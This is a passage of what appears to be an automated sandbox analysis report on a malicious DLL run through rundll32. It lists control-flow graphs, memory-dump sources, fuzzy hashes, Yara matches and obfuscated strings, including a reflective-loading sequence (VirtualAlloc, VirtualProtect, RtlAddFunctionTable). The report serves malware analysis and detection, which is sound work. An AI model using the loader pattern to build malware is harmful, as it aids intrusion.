                                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,$,$2S=$i`}G
                                                                                                                                                • API String ID: 0-4285990414
                                                                                                                                                • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                                • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                                • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                                • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:10.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:11
                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                execution_graph 3264 26ed8fa0000 3265 26ed8fa0183 3264->3265 3266 26ed8fa043e VirtualAlloc 3265->3266 3270 26ed8fa0462 3266->3270 3267 26ed8fa0a7b 3268 26ed8fa0531 GetNativeSystemInfo 3268->3267 3269 26ed8fa056d VirtualAlloc 3268->3269 3274 26ed8fa058b 3269->3274 3270->3267 3270->3268 3271 26ed8fa0a00 3271->3267 3272 26ed8fa0a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 26ed8fa09d9 VirtualProtect 3273->3274 3274->3271 3274->3273

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 26ed8fa0000-26ed8fa0460 call 26ed8fa0aa8 * 2 VirtualAlloc 22 26ed8fa048a-26ed8fa0494 0->22 23 26ed8fa0462-26ed8fa0466 0->23 26 26ed8fa049a-26ed8fa049e 22->26 27 26ed8fa0a91-26ed8fa0aa6 22->27 24 26ed8fa0468-26ed8fa0488 23->24 24->22 24->24 26->27 28 26ed8fa04a4-26ed8fa04a8 26->28 28->27 29 26ed8fa04ae-26ed8fa04b2 28->29 29->27 30 26ed8fa04b8-26ed8fa04bf 29->30 30->27 31 26ed8fa04c5-26ed8fa04d2 30->31 31->27 32 26ed8fa04d8-26ed8fa04e1 31->32 32->27 33 26ed8fa04e7-26ed8fa04f4 32->33 33->27 34 26ed8fa04fa-26ed8fa0507 33->34 35 26ed8fa0509-26ed8fa0511 34->35 36 26ed8fa0531-26ed8fa0567 GetNativeSystemInfo 34->36 38 26ed8fa0513-26ed8fa0518 35->38 36->27 37 26ed8fa056d-26ed8fa0589 VirtualAlloc 36->37 39 26ed8fa058b-26ed8fa059e 37->39 40 26ed8fa05a0-26ed8fa05ac 37->40 41 26ed8fa051a-26ed8fa051f 38->41 42 26ed8fa0521 38->42 39->40 44 26ed8fa05af-26ed8fa05b2 40->44 43 26ed8fa0523-26ed8fa052f 41->43 42->43 43->36 43->38 46 26ed8fa05c1-26ed8fa05db 44->46 47 26ed8fa05b4-26ed8fa05bf 44->47 48 26ed8fa05dd-26ed8fa05e2 46->48 49 26ed8fa061b-26ed8fa0622 46->49 47->44 50 26ed8fa05e4-26ed8fa05ea 48->50 51 26ed8fa0628-26ed8fa062f 49->51 52 26ed8fa06db-26ed8fa06e2 49->52 56 26ed8fa05ec-26ed8fa0609 50->56 57 26ed8fa060b-26ed8fa0619 50->57 51->52 53 26ed8fa0635-26ed8fa0642 51->53 54 26ed8fa06e8-26ed8fa06f9 52->54 55 26ed8fa0864-26ed8fa086b 52->55 53->52 58 26ed8fa0648-26ed8fa064f 53->58 59 26ed8fa0702-26ed8fa0705 54->59 60 26ed8fa0917-26ed8fa0929 55->60 61 26ed8fa0871-26ed8fa087f 55->61 56->56 56->57 57->49 57->50 63 26ed8fa0654-26ed8fa0658 58->63 64 26ed8fa0707-26ed8fa070a 59->64 65 26ed8fa06fb-26ed8fa06ff 59->65 66 26ed8fa0a07-26ed8fa0a1a 60->66 67 26ed8fa092f-26ed8fa0937 60->67 62 26ed8fa090e-26ed8fa0911 61->62 62->60 72 26ed8fa0884-26ed8fa08a9 62->72 69 26ed8fa06c0-26ed8fa06ca 63->69 70 26ed8fa0788-26ed8fa078e 64->70 71 26ed8fa070c-26ed8fa071d 64->71 65->59 87 26ed8fa0a1c-26ed8fa0a27 66->87 88 26ed8fa0a40-26ed8fa0a4a 66->88 68 26ed8fa093b-26ed8fa093f 67->68 73 26ed8fa09ec-26ed8fa09fa 68->73 74 26ed8fa0945-26ed8fa095a 68->74 78 26ed8fa06cc-26ed8fa06d2 69->78 79 26ed8fa065a-26ed8fa0669 69->79 76 26ed8fa0794-26ed8fa07a2 70->76 75 26ed8fa071f-26ed8fa0720 71->75 71->76 94 26ed8fa0907-26ed8fa090c 72->94 95 26ed8fa08ab-26ed8fa08b1 72->95 73->68 83 26ed8fa0a00-26ed8fa0a01 73->83 80 26ed8fa095c-26ed8fa095e 74->80 81 26ed8fa097b-26ed8fa097d 74->81 86 26ed8fa0722-26ed8fa0784 75->86 89 26ed8fa07a8 76->89 90 26ed8fa085d-26ed8fa085e 76->90 78->63 91 26ed8fa06d4-26ed8fa06d5 78->91 84 26ed8fa067a-26ed8fa067e 79->84 85 26ed8fa066b-26ed8fa0678 79->85 92 26ed8fa0960-26ed8fa096c 80->92 93 26ed8fa096e-26ed8fa0979 80->93 97 26ed8fa097f-26ed8fa0981 81->97 98 26ed8fa09a2-26ed8fa09a4 81->98 83->66 99 26ed8fa068c-26ed8fa0690 84->99 100 26ed8fa0680-26ed8fa068a 84->100 96 26ed8fa06bd-26ed8fa06be 85->96 86->86 101 26ed8fa0786 86->101 102 26ed8fa0a38-26ed8fa0a3e 87->102 104 26ed8fa0a4c-26ed8fa0a54 88->104 105 26ed8fa0a7b-26ed8fa0a8e 88->105 103 26ed8fa07ae-26ed8fa07d4 89->103 90->55 91->52 106 26ed8fa09be-26ed8fa09bf 92->106 93->106 94->62 114 26ed8fa08bb-26ed8fa08c8 95->114 115 26ed8fa08b3-26ed8fa08b9 95->115 96->69 107 26ed8fa0989-26ed8fa098b 97->107 108 26ed8fa0983-26ed8fa0987 97->108 112 26ed8fa09a6-26ed8fa09aa 98->112 113 26ed8fa09ac-26ed8fa09bb 98->113 110 26ed8fa06a5-26ed8fa06a9 99->110 111 26ed8fa0692-26ed8fa06a3 99->111 109 26ed8fa06b6-26ed8fa06ba 100->109 101->76 102->88 116 26ed8fa0a29-26ed8fa0a35 102->116 131 26ed8fa07d6-26ed8fa07d9 103->131 132 26ed8fa0835-26ed8fa0839 103->132 104->105 117 26ed8fa0a56-26ed8fa0a79 RtlAddFunctionTable 104->117 105->27 121 26ed8fa09c5-26ed8fa09cb 106->121 107->98 119 26ed8fa098d-26ed8fa098f 107->119 108->106 109->96 110->96 120 26ed8fa06ab-26ed8fa06b3 110->120 111->109 112->106 113->106 123 26ed8fa08ca-26ed8fa08d1 114->123 124 26ed8fa08d3-26ed8fa08e5 114->124 122 26ed8fa08ea-26ed8fa08fe 115->122 116->102 117->105 126 26ed8fa0999-26ed8fa09a0 119->126 127 26ed8fa0991-26ed8fa0997 119->127 120->109 128 26ed8fa09d9-26ed8fa09e9 VirtualProtect 121->128 129 26ed8fa09cd-26ed8fa09d3 121->129 122->94 142 26ed8fa0900-26ed8fa0905 122->142 123->123 123->124 124->122 126->121 127->106 128->73 129->128 133 26ed8fa07db-26ed8fa07e1 131->133 134 26ed8fa07e3-26ed8fa07f0 131->134 135 26ed8fa083b 132->135 136 26ed8fa0844-26ed8fa0850 132->136 138 26ed8fa0812-26ed8fa082c 133->138 139 26ed8fa07fb-26ed8fa080d 134->139 140 26ed8fa07f2-26ed8fa07f9 134->140 135->136 136->103 141 26ed8fa0856-26ed8fa0857 136->141 138->132 144 26ed8fa082e-26ed8fa0833 138->144 139->138 140->139 140->140 141->90 142->95 144->131
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278697369.0000026ED8FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026ED8FA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_26ed8fa0000_rundll32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction ID: 0256faaaf34ebf4959ac6d21dbec03e232a672e0f9a049f35d5cfa709fdb55b0
                                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                                • Instruction Fuzzy Hash: F5722534618B4CCBDB68DF18D8897BAB7E4FB98314F25422DE89AC3241DB35D542CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                                • API String ID: 0-464535774
                                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                                • API String ID: 0-3477398917
